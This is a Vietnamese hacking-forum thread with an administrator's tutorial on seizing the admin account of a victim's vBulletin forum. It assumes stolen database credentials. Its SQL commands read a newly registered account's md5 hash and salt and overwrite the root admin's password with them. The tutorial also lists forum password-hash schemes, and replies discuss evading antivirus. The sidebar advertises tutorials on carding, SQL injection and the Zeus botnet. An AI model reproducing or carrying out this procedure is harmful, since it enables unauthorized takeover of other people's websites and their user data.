• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Tut hướng dẫn chiếm quyền admin vbb trong data

Admin

Well-Known Member
Staff member
Administrator
Tut này cho anh em học hỏi có rất nhiều trường hợp cần linh động.
Ở đây mình sẽ hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
PHP:
$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';
Hiểu biết sơ về câu lệnh SQL
Đầu tiên là các dạng mã hóa của một vài forum thông dụng hiện nay như:
1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))
Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Select * from user
Với lệnh trên thì ta có thể xem được tất cả user trên forum
Nếu forum victim có số lượng thành viện cỡ hơn 3000 thì ta dung lệnh :
Select password , salt from user where username='hacker'
Ta được
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y
Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong forum victim có nhiều admin ma ta ko biết admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A: Vào file config.php và tìm các dòng sau
PHP:
$config['SpecialUsers']['canviewadminlog'] $config['SpecialUsers']['canpruneadminlog'] $config['SpecialUsers']['superadministrators']
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thường thì mặc đinh định là userid=1 là rootadmin)
Ta tiếp tục dùng lệnh
Select password , salt from user where userid=1
Lấy được pass md5 & salt
Vi dụ:
Pass md5 : eaf1672523371b7736282bbfc2c8b2ac Salt : 2/D
Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin”
Câu lệnh hoàn chỉnh như sau:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”
Code:
5cc70df698ca01c3adb396a08b4873ad
là pass md5 của nick hacker
Code:
?`Y
là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào forum victim đăng nhập bằng nick admin với password là 123456
 
Bị kaspersky anti ùi nè
Screenshot Uploader



----------> Bổ sung bài viết lúc 17:12 <----------> Bài viết trước lúc 17:11 <----------

 
Chẳng có tut hack nào mà ko có virus cả
 
Phải có cách ẩn đi ý.
Cho nó vào // trong php hihi.
Mà sao bbcode
PHP:
mình k xài được vậy?
 
Bt mà................
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Myshare Share Tut hướng dẫn add site(tên miền) lên google Hosting / Domain 0
B [tut] hướng dẫn dowload link mediafire bằng Uc browser S40 0
T xin tut hướng dẫn cài đặt vBSEO hay friend url chi tiết Vbulletin 5
Hailan TUT Hướng dẫn mod Dual Screen trên mobile Thủ thuật ĐTDĐ 1
Admin TUT hướng dẫn anh em mod full avatar Crack, hack, mod, ghép game, ứng dụng 3
Admin Share tut hướng dẫn sử dụng google part 1 Thảo luận wap việt 0
Admin TUT hướng dẫn tạo diễn đàn cơ bản trên wapka.mobi Wap builder, wapego, xtgem, wen.ru, wapka, wap4 17
C [TUT] Hướng dẫn làm 4rum phpbb full hình ảnh By Wap-Mobile.Net Kiến thức lập trình 2
L [TUT] Hướng dẫn làm johncms trên 000webhost Johncms 27
Admin [Hướng Dẫn] TUT leech bài từ các báo điện tử về forum vbb Vbulletin 6
Admin [TUT] Hướng dẫn lỗi sql injection cơ bản Security - Local - Hacking 0
Admin [TUT] Hướng dẫn leech file lên host nhanh chóng Thảo luận wap việt 12
Admin [Share] Tut hướng dẫn dùng sock fake ip Kiến thức lập trình 4
Admin [TUT] Hướng dẫn làm forum phpbb trên S40 dễ dàng. Phpbb3x 40
Q Cần mua tut reg domain bằng CCN Hỏi đáp về domain & hosting 2
Admin Share tut bắn reach ads Facebook mới nhất dùng thẻ cứng Tut, tool, mmo 2
Admin Share tut ân hạn Facebook mới nhất 2020 Tut, tool, mmo 2
Admin Tut kháng Ad Breaks bị tắt kiếm tiền thành công Tut, tool, mmo 0
Admin Share một số tut chiến Facebook Ad Breaks theo kinh nghiệm Tut, tool, mmo 0
S [Tut]Basic Hacking - Hacking cơ bản Exploit 0
Smobi Share [Tut] Làm một vật trở nên trong suốt bằng PTS Thiết kế đồ họa 0
KhangSkull [TUT] Khai thác SQLi dạng .html SQL injection 0
Admin Tut reseller domain không die Tut, tool, mmo 1
Admin Share video tut reg domain quốc tế free bằng ccv thực vật Tut, tool, mmo 0
Hero Share TUT Local Full 2012 Tut, tool, mmo 6
Admin [Tut] hack bạn gái cho it Thơ, báo, tạp chí 2
H Tut Hack Card Viettel Số Lượng Ko Giới Hạn Trò chuyện linh tinh 14
Admin Share Tut Spam Facebook Tut, tool, mmo 0
blog4me Share Tổng hợp một số TUT chơi CC Security - Local - Hacking 2
S TUT Vps Free 1 Tháng VPS & Dedicated Server 1
Admin Share tut reg domain .vn 2013 - nhanh không nát Tut, tool, mmo 3
Hero [TUT] Reg Domain, VPS, Hosting Đủ Loại Security - Local - Hacking 11
Admin Share tut đâm domain .my free 1-5 year Tut, tool, mmo 2
Admin Share Tut Hosting Pháp Disk 512mb Bw Unlimited Tut, tool, mmo 0
Admin Share tut reg domain bằng ccv, ccn 1-10 years Tut, tool, mmo 2
Admin Share tut ship giầy nhầm nước Tut, tool, mmo 5
V Hướng dẫn [TUT] Gửi email từ localhost bằng Mercury Mail VPS & Dedicated Server 0
V Share [Cash Out] Tut site cash PP&CC về PPVN đang được thịnh hành Hacking 0
V Share [Tut] Fake Ip từ A đến Z Hacking 0
V Share [Tut] Hack site lỗi SQLi với Havij + Up shell - Guan™ Hacking 0
V Share [TUT] sữ dụng Botnet ZEUS chi tiết Hacking 0
K Xin anh em co tut an gift Hacking 0
S [tut] domain .*** free = ccn Hosting & Domain Free 0
J Share [Tut] Fake Ip từ A đến Z Security - Local - Hacking 0
S Share [Shipping Tut] Key KIS 2012, KIS 2013, NIS 2012, MS.... Hacking 1
Admin [Tut] domain yahoo 5 năm Tut, tool, mmo 15
X Share [TUT] Đăng kí domain .me 1 năm miễn phí Hosting & Domain Free 14
Admin Share tut ship nước hoa bằng ccv Tut, tool, mmo 7
Admin [Tut] sql dạng html Tut, tool, mmo 2
V [TUT] VPS Win/Linux UK VPS & Dedicated Server 6

Similar threads

New posts New threads New resources

Back
Top